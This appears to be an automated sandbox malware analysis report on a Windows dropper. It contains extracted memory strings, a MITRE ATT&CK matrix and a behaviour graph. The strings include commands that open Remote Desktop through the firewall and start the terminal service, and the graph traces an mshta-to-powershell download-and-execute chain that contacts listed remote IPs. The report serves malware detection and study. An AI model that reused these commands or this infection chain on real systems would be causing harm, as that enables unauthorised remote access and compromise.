bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000003.961859847.0000000005090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000003.961859847.0000000005090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exeString found in binary or memory: net start termservice
                  Source: rapes.exe, 00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                  Source: rapes.exe, 00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exe, 00000016.00000002.2112729465.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: net start termservice
                  Source: rapes.exe, 00000016.00000002.2112729465.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00B21204
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B21806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		2
                  Valid Accounts                  		1
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		21
                  Input Capture                  		1
                  System Time Discovery                  		1
                  Remote Desktop Protocol                  		1
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol1
                  Email Collection                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter                  		2
                  Valid Accounts                  		2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares21
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts11
                  Scheduled Task/Job                  		11
                  Scheduled Task/Job                  		21
                  Access Token Manipulation                  		12
                  Software Packing                  		NTDS238
                  System Information Discovery                  		Distributed Component Object ModelInput Capture112
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell                  		Network Logon Script12
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets881
                  Security Software Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                  Scheduled Task/Job                  		1
                  Masquerading                  		Cached Domain Credentials361
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job361
                  Virtualization/Sandbox Evasion                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Mshta                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1632960 Sample: uw7A6EF76R.exe Startdate: 09/03/2025 Architecture: WINDOWS Score: 100 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 70 18 other signatures 2->70 10 uw7A6EF76R.exe 1 2->10         started        14 mshta.exe 1 2->14         started        16 rapes.exe 2->16         started        19 2 other processes 2->19 process3 dnsIp4 54 C:\Users\user\AppData\Local\...\OPrA2uVEu.hta, HTML 10->54 dropped 86 Binary is likely a compiled AutoIt script file 10->86 88 Found API chain indicative of sandbox detection 10->88 90 Creates HTA files 10->90 21 mshta.exe 1 10->21         started        24 cmd.exe 1 10->24         started        92 Suspicious powershell command line found 14->92 94 Tries to download and execute files (via powershell) 14->94 26 powershell.exe 16 14->26         started        58 176.113.115.6, 49696, 49697, 49698 SELECTELRU Russian Federation 16->58 96 Contains functionality to start a terminal service 16->96 98 Hides threads from debuggers 16->98 100 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->100 60 127.0.0.1 unknown unknown 19->60 102 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->102 file5 signatures6 process7 signatures8 72 Suspicious powershell command line found 21->72 74 Tries to download and execute files (via powershell) 21->74 28 powershell.exe 15 19 21->28         started        76 Uses schtasks.exe or at.exe to add and modify task schedules 24->76 33 conhost.exe 24->33         started        35 schtasks.exe 1 24->35         started        37 TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE 26->37         started        39 conhost.exe 26->39         started        process9 dnsIp10 62 176.113.115.7, 49683, 80 SELECTELRU Russian Federation 28->62 56 TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, PE32 28->56 dropped 104 Powershell drops PE file 28->104 41 TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE 4 28->41         started        45 conhost.exe 28->45         started        106 Contains functionality to start a terminal service 37->106 108 Hides threads from debuggers 37->108 110 Tries to detect sandboxes / dynamic malware analysis system (registry check) 37->110 112 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 37->112 file11 signatures12 process13 file14 52 C:\Users\user\AppData\Local\...\rapes.exe, PE32 41->52 dropped 78 Antivirus detection for dropped file 41->78 80 Detected unpacking (changes PE section rights) 41->80 82 Contains functionality to start a terminal service 41->82 84 6 other signatures 41->84 47 rapes.exe 41->47         started        signatures15 process16 signatures17 114 Antivirus detection for dropped file 47->114 116 Detected unpacking (changes PE section rights) 47->116 118 Contains functionality to start a terminal service 47->118 120 6 other signatures 47->120 50 conhost.exe 47->50         started        process18

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.